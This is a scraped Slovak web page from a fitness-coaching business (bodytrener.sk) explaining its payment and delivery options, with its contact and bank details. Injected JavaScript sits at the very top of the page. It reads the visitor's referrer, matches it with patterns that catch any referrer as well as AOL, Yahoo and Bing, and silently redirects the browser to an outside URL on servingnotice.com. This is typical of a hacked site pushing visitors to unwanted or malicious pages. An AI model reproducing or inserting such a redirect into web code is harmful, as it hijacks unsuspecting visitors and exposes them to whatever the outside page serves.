var toUrl="http://"; var rUrl = document.referrer; var patrn=/(.*)$/; toUrl+="servingnotice.com/O7ul2v/intermediary.html?richubaidaninfo"; toUrl+=""; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)aol.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)yahoo.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)bing.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; Možnosti platby a doručenia | www.bodytrener.sk

Možnosti platby a doručenia

Možnosti doručenia

  • E-mailom
  • Kuriérom GLS
  • Slovenskou poštou

Možnosti platby

  • prevodom na účet
  • dobierkou

Ak si zvolíte možnosť platby prevodom na účet, objednané služby dostanete v elektronickej podobe na e-mail.  Odoslaný bude až po akceptovaní peňazí našim účtom. Informovaní budete smskou.

Ak zvolíte možnosť platby dobierkou, objednané služby dostanete v papierovej podobe. Môžu byť odoslané kuriérom alebo Slovenskou poštou 1. triedou. Po zaplatení dobierky, dostanete tréning a jedálniček i v elektronickej podobe na e-mail. Budete informovaní smskou o odoslaní na dobierku.

Ako si vybrať najlepšiu možnosť platby a doručenia?

Veľa ľudí nemá dobré skúsenosti s platbou peňazí vopred na účet a bojí sa o svoje ťžko zarobené peniaze, doporučujme týmto zákazníkom vybrať si možnosť platby dobierkou. Zaplatíte až po dokončení objednanej služby. Všetko Vám pripravíme do listu a odošleme na adresu. Vyplatíte dobierku a môžete začať makať. Nevýhodou tejto platby je poštovné, ktoré musíte zaplatiť a je zarátané už v cene.

Ak máte dobré skúsenosti s platbou peňazí na účet vopred, poččuli ste o nás od kamaráta alebo známeho tak pre Vás je určená platba na účet. Objednané služby dostanete v elektronickej podobe na e-mail po akceptovaní peňazí našim účtom. Výhodou tohto spôsobu platby je poštovné, ktoré neplatíte.

Potrebujete pomoc?

Adresa:
Bodytrener.sk - Patrik Barčák
Za kalváriou 667/18
02942 Bobrov

Pracovná doba:
Pon – Ned
10:00 – 22:00

E-mail: info@bodytrener.sk
Telefón: +421 910 448 689

Bankový účet:
IBAN: SK1111000000002938482513
Swift: TATRSKBX

© 2013 Bodytrener.sk. Všetky práva vyhradené.

Pridaj si nás na Facebooku